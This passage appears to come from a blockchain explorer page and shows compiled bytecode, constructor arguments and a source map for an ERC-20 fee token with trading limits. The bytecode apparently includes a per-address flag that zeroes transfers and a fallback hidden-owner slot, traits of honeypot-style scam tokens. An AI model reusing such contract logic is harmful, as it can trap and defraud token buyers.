fff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6114f7611970565b8060125f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f4b89c347592b1d537e066cb4ed98d87696ae35164745d7e370e4add16941dc928260405161159191906130a7565b60405180910390a25050565b6115a5611970565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603611613576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161160a90613b37565b60405180910390fd5b61161c81612684565b50565b5f805f60115f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16925060125f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16915060135f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1690509193909250565b611715611970565b80600e819055506064600e541115611762576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161175990613bc5565b60405180910390fd5b7f38513c502b0ab4834ac1df9502b76f75dcf7092469782cfd0db7fe664388e25e600e54600e54600e5460405161179b939291906133b6565b60405180910390a150565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361181b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161181290613c53565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611889576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161188090613ce1565b60405180910390fd5b8060015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161196391906131e2565b60405180910390a3505050565b6119786117a6565b73ffffffffffffffffffffffffffffffffffffffff16611996612747565b73ffffffffffffffffffffffffffffffffffffffff16146119ec576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e390613d49565b60405180910390fd5b565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611a5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a5390613dd7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611aca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac190613e65565b60405180910390fd5b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403611b51574360025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5f8103611b6857611b6383835f61275a565b6124d6565b600860179054906101000a900460ff161561204d57611b85610eb8565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bf35750611bc3610eb8565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c2b57505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c65575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c7e5750600860149054906101000a900460ff16155b1561204c57600860159054906101000a900460ff16611d725760115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d32575060115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6890613ef3565b60405180910390fd5b5b60135f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611e0f575060125f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611eb657600d54811115611e59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5090613f81565b60405180910390fd5b600c54611e6583610db0565b82611e70919061363a565b1115611eb1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ea890613fe9565b60405180910390fd5b61204b565b60135f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f53575060125f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611fa257600d54811115611f9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f9490614077565b60405180910390fd5b61204a565b60125f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661204957600c54611ffc83610db0565b82612007919061363a565b1115612048576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161203f90613fe9565b60405180910390fd5b5b5b5b5b5b5f61205730610db0565b90505f600954821015905080801561207b5750600860169054906101000a900460ff165b80156120945750600860149054906101000a900460ff16155b80156120e7575060135f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561213a575060115f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561218d575060115f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561219b575042600b5414155b156121e6576001600860146101000a81548160ff0219169083151502179055506121c4836129cf565b42600b819055505f600860146101000a81548160ff0219169083151502179055505b5f600860149054906101000a900460ff16905060115f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612294575060115f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561229d575f90505b5f6122a88588612ad4565b945081156124c65760135f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561230757505f600f54115b1561233b576123346064612326600f5488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90506124a3565b60135f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561239257505f600e54115b156123c6576123bf60646123b1600e5488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90506124a2565b5f60105411801561241e575060135f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612471575060135f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156124a15761249e606461249060105488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90505b5b5b5f8111156124b7576124b687308361275a565b5b80856124c39190614095565b94505b6124d187878761275a565b505050505b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612549576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161254090614138565b60405180910390fd5b612554825f83612c16565b5f805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818111156125d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ce906141c6565b60405180910390fd5b8181015f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161267791906131e2565b60405180910390a3505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f80612751612c1b565b90508091505090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036127c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127bf90613dd7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161282d90613e65565b60405180910390fd5b612841838383612c16565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156128c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128bb90614254565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254612952919061363a565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516129b691906131e2565b60405180910390a36129c9848484612cbf565b50505050565b5f6129d930610db0565b90505f8082036129ea575050612ad1565b600a548211156129fa57600a5491505b600860189054906101000a900460ff168015612a215750600f83612a1e91906137f1565b82115b15612a3657600f83612a3391906137f1565b91505b5f829050612a4381612cc4565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051612a889061429f565b5f6040518083038185875af1925050503d805f8114612ac2576040519150601f19603f3d011682016040523d82523d5f602084013e612ac7565b606091505b5050809250505050505b50565b5f80603290505f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205443612b249190614095565b90505f8282612b3391906137f1565b90505f60648211612b5057816064612b4b9190614095565b612b52565b5f5b90505f60648289612b6391906137f1565b612b6d919061385f565b905060145f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615612bdd57612bd15f82612ef790919063ffffffff16565b95505050505050612be6565b87955050505050505b92915050565b5f8183612bf991906137f1565b905092915050565b5f8183612c0e919061385f565b905092915050565b505050565b5f8073ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c975760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16612cba565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b5f600267ffffffffffffffff811115612ce057612cdf6142b3565b5b604051908082528060200260200182016040528015612d0e5781602001602082028036833780820191505090505b50905030815f81518110612d2557612d2461350b565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612dc8573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612dec91906142f4565b81600181518110612e0057612dff61350b565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612e65307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d846117ad565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612ec6959493929190614418565b5f604051808303815f87803b158015612edd575f80fd5b505af1158015612eef573d5f803e3d5ffd5b505050505050565b5f81831015612f065781612f08565b825b905092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612f47578082015181840152602081019050612f2c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612f6c82612f10565b612f768185612f1a565b9350612f86818560208601612f2a565b612f8f81612f52565b840191505092915050565b5f6020820190508181035f830152612fb28184612f62565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612feb82612fc2565b9050919050565b612ffb81612fe1565b8114613005575f80fd5b50565b5f8135905061301681612ff2565b92915050565b5f819050919050565b61302e8161301c565b8114613038575f80fd5b50565b5f8135905061304981613025565b92915050565b5f806040838503121561306557613064612fba565b5b5f61307285828601613008565b92505060206130838582860161303b565b9150509250929050565b5f8115159050919050565b6130a18161308d565b82525050565b5f6020820190506130ba5f830184613098565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126130e1576130e06130c0565b5b8235905067ffffffffffffffff8111156130fe576130fd6130c4565b5b60208301915083602082028301111561311a576131196130c8565b5b9250929050565b61312a8161308d565b8114613134575f80fd5b50565b5f8135905061314581613121565b92915050565b5f805f6040848603121561316257613161612fba565b5b5f84013567ffffffffffffffff81111561317f5761317e612fbe565b5b61318b868287016130cc565b9350935050602061319e86828701613137565b9150509250925092565b5f602082840312156131bd576131bc612fba565b5b5f6131ca84828501613008565b91505092915050565b6131dc8161301c565b82525050565b5f6020820190506131f55f8301846131d3565b92915050565b5f806040838503121561321157613210612fba565b5b5f61321e85828601613008565b925050602061322f85828601613137565b9150509250929050565b5f805f606084860312156132505761324f612fba565b5b5f61325d86828701613008565b935050602061326e86828701613008565b925050604061327f8682870161303b565b9150509250925092565b5f60608201905061329c5f830186613098565b6132a960208301856131d3565b6132b660408301846131d3565b949350505050565b5f60ff82169050919050565b6132d3816132be565b82525050565b5f6020820190506132ec5f8301846132ca565b92915050565b5f805f806060858703121561330a57613309612fba565b5b5f85013567ffffffffffffffff81111561332757613326612fbe565b5b613333878288016130cc565b9450945050602061334687828801613008565b92505060406133578782880161303b565b91505092959194509250565b5f6020828403121561337857613377612fba565b5b5f6133858482850161303b565b91505092915050565b61339781612fe1565b82525050565b5f6020820190506133b05f83018461338e565b92915050565b5f6060820190506133c95f8301866131d3565b6133d660208301856131d3565b6133e360408301846131d3565b949350505050565b5f805f6060848603121561340257613401612fba565b5b5f61340f86828701613137565b93505060206134208682870161303b565b92505060406134318682870161303b565b9150509250925092565b5f806040838503121561345157613450612fba565b5b5f61345e85828601613008565b925050602061346f85828601613008565b9150509250929050565b5f60608201905061348c5f830186613098565b6134996020830185613098565b6134a66040830184613098565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806134f257607f821691505b602082108103613505576135046134ae565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61356f8261301c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036135a1576135a0613538565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f613606602883612f1a565b9150613611826135ac565b604082019050919050565b5f6020820190508181035f830152613633816135fa565b9050919050565b5f6136448261301c565b915061364f8361301c565b925082820190508082111561366757613666613538565b5b92915050565b7f546f74616c207472616e73666572206665652063616e6e6f74206265206869675f8201527f686572207468616e203130302500000000000000000000000000000000000000602082015250565b5f6136c7602d83612f1a565b91506136d28261366d565b604082019050919050565b5f6020820190508181035f8301526136f4816136bb565b9050919050565b7f546f74616c2073656c6c206665652063616e6e6f7420626520686967686572205f8201527f7468616e20313030250000000000000000000000000000000000000000000000602082015250565b5f613755602983612f1a565b9150613760826136fb565b604082019050919050565b5f6020820190508181035f83015261378281613749565b9050919050565b7f43616e6e6f7420736574206d61785478206c6f776572207468616e20302e32255f82015250565b5f6137bd602083612f1a565b91506137c882613789565b602082019050919050565b5f6020820190508181035f8301526137ea816137b1565b9050919050565b5f6137fb8261301c565b91506138068361301c565b92508282026138148161301c565b9150828204841483151761382b5761382a613538565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6138698261301c565b91506138748361301c565b92508261388457613883613832565b5b828204905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e205f8201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b5f6138e9602483612f1a565b91506138f48261388f565b604082019050919050565b5f6020820190508181035f830152613916816138dd565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f613977602583612f1a565b91506139828261391d565b604082019050919050565b5f6020820190508181035f8301526139a48161396b565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e5f8201527f20302e30312520746f74616c20737570706c792e000000000000000000000000602082015250565b5f613a05603483612f1a565b9150613a10826139ab565b604082019050919050565b5f6020820190508181035f830152613a32816139f9565b9050919050565b7f6d6178696d756d20616d6f756e742063616e74206265206869676865722074685f8201527f616e206d696e696d756d00000000000000000000000000000000000000000000602082015250565b5f613a93602a83612f1a565b9150613a9e82613a39565b604082019050919050565b5f6020820190508181035f830152613ac081613a87565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613b21602683612f1a565b9150613b2c82613ac7565b604082019050919050565b5f6020820190508181035f830152613b4e81613b15565b9050919050565b7f546f74616c20627579206665652063616e6e6f742062652068696768657220745f8201527f68616e2031303025000000000000000000000000000000000000000000000000602082015250565b5f613baf602883612f1a565b9150613bba82613b55565b604082019050919050565b5f6020820190508181035f830152613bdc81613ba3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613c3d602483612f1a565b9150613c4882613be3565b604082019050919050565b5f6020820190508181035f830152613c6a81613c31565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613ccb602283612f1a565b9150613cd682613c71565b604082019050919050565b5f6020820190508181035f830152613cf881613cbf565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613d33602083612f1a565b9150613d3e82613cff565b602082019050919050565b5f6020820190508181035f830152613d6081613d27565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613dc1602583612f1a565b9150613dcc82613d67565b604082019050919050565b5f6020820190508181035f830152613dee81613db5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613e4f602383612f1a565b9150613e5a82613df5565b604082019050919050565b5f6020820190508181035f830152613e7c81613e43565b9050919050565b7f5f7472616e736665723a3a2054726164696e67206973206e6f742061637469765f8201527f652e000000000000000000000000000000000000000000000000000000000000602082015250565b5f613edd602283612f1a565b9150613ee882613e83565b604082019050919050565b5f6020820190508181035f830152613f0a81613ed1565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d617854782e0000000000000000000000000000000000000000000000000000602082015250565b5f613f6b602683612f1a565b9150613f7682613f11565b604082019050919050565b5f6020820190508181035f830152613f9881613f5f565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613fd3601383612f1a565b9150613fde82613f9f565b602082019050919050565b5f6020820190508181035f83015261400081613fc7565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d617854782e00000000000000000000000000000000000000000000000000602082015250565b5f614061602783612f1a565b915061406c82614007565b604082019050919050565b5f6020820190508181035f83015261408e81614055565b9050919050565b5f61409f8261301c565b91506140aa8361301c565b92508282039050818111156140c2576140c1613538565b5b92915050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f614122602183612f1a565b915061412d826140c8565b604082019050919050565b5f6020820190508181035f83015261414f81614116565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f6141b0602283612f1a565b91506141bb82614156565b604082019050919050565b5f6020820190508181035f8301526141dd816141a4565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61423e602683612f1a565b9150614249826141e4565b604082019050919050565b5f6020820190508181035f83015261426b81614232565b9050919050565b5f81905092915050565b50565b5f61428a5f83614272565b91506142958261427c565b5f82019050919050565b5f6142a98261427f565b9150819050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f815190506142ee81612ff2565b92915050565b5f6020828403121561430957614308612fba565b5b5f614316848285016142e0565b91505092915050565b5f819050919050565b5f819050919050565b5f61434b6143466143418461431f565b614328565b61301c565b9050919050565b61435b81614331565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b61439381612fe1565b82525050565b5f6143a4838361438a565b60208301905092915050565b5f602082019050919050565b5f6143c682614361565b6143d0818561436b565b93506143db8361437b565b805f5b8381101561440b5781516143f28882614399565b97506143fd836143b0565b9250506001810190506143de565b5085935050505092915050565b5f60a08201905061442b5f8301886131d3565b6144386020830187614352565b818103604083015261444a81866143bc565b9050614459606083018561338e565b61446660808301846131d3565b969550505050505056fea26469706673582212208a8982863b554086ba5b2e644d8734251d022296b45e043f06a44249c9286ed064736f6c63430008150033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
0000000000000000000000003f16a4c5c2e235cf1affe5af640844e14f3d8c7b
-----Decoded View---------------
Arg [0] : _distributor (address): 0x3f16a4c5C2e235Cf1AFFE5AF640844E14f3D8c7B
-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000003f16a4c5c2e235cf1affe5af640844e14f3d8c7b
Deployed Bytecode Sourcemap
4709:18933:3:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1013:100:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3245:194;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;21357:224:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13142:184;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2132:108:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13573:196:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;3917:529:1;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15008:245:3;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;1975:92:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;4851:290;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20988:210:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;21206:143;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;23504:94;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2303:143:1;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1413:103:3;;;;;;;;;;;;;:::i;:::-;;8715:163;;;;;;;;;;;;;:::i;:::-;;12716:235;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;777:87;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12417:291;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10538:221;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15821:332;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;1232:104:1;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10970:266:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5640:475:1;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2659:200;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9632:670:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15416:159;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8984:162;;;;;;;;;;;;;:::i;:::-;;14300:361;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;2922:176:1;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11983:202:3;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1800:201;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;16613:450;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;11466:246;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1013:100:1;1067:13;1100:5;1093:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1013:100;:::o;3245:194::-;3353:4;3370:39;3379:12;:10;:12::i;:::-;3393:7;3402:6;3370:8;:39::i;:::-;3427:4;3420:11;;3245:194;;;;:::o;21357:224:3:-;663:13;:11;:13::i;:::-;21447:9:::1;21442:132;21466:8;;:15;;21462:1;:19;21442:132;;;21559:3;21503:40;:53;21544:8;;21553:1;21544:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;21503:53;;;;;;;;;;;;;;;;:59;;;;;;;;;;;;;;;;;;21483:3;;;;;:::i;:::-;;;;21442:132;;;;21357:224:::0;;;:::o;13142:184::-;663:13;:11;:13::i;:::-;13263:15:::1;;;;;;;;;;;13228:51;;13251:10;13228:51;;;;;;;;;;;;13308:10;13290:15;;:28;;;;;;;;;;;;;;;;;;13142:184:::0;:::o;2132:108:1:-;2193:7;2220:12;;2213:19;;2132:108;:::o;13573:196:3:-;663:13;:11;:13::i;:::-;13704:9:::1;13678:17;:23;13696:4;13678:23;;;;;;;;;;;;;;;;:35;;;;;;;;;;;;;;;;;;13745:4;13729:32;;;13751:9;13729:32;;;;;;:::i;:::-;;;;;;;;13573:196:::0;;:::o;3917:529:1:-;4057:4;4074:36;4084:6;4092:9;4103:6;4074:9;:36::i;:::-;4123:24;4150:11;:19;4162:6;4150:19;;;;;;;;;;;;;;;:33;4170:12;:10;:12::i;:::-;4150:33;;;;;;;;;;;;;;;;4123:60;;4236:6;4216:16;:26;;4194:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;4346:57;4355:6;4363:12;:10;:12::i;:::-;4396:6;4377:16;:25;4346:8;:57::i;:::-;4434:4;4427:11;;;3917:529;;;;;:::o;15008:245:3:-;15084:19;15105:18;15125:14;15174:13;;;;;;;;;;;15157:30;;15211:9;;15198:22;;15240:5;;15231:14;;15008:245;;;:::o;1975:92:1:-;2033:5;2058:1;2051:8;;1975:92;:::o;4851:290::-;4964:4;4981:130;5004:12;:10;:12::i;:::-;5031:7;5090:10;5053:11;:25;5065:12;:10;:12::i;:::-;5053:25;;;;;;;;;;;;;;;:34;5079:7;5053:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;4981:8;:130::i;:::-;5129:4;5122:11;;4851:290;;;;:::o;20988:210:3:-;663:13;:11;:13::i;:::-;21092:9:::1;21087:104;21111:4;;:11;;21107:1;:15;21087:104;;;21166:4;;21171:1;21166:7;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;21149:30;;21158:6;21149:30;;;21175:3;21149:30;;;;;;:::i;:::-;;;;;;;;21124:3;;;;;:::i;:::-;;;;21087:104;;;;20988:210:::0;;;;:::o;21206:143::-;21267:4;21290:40;:51;2133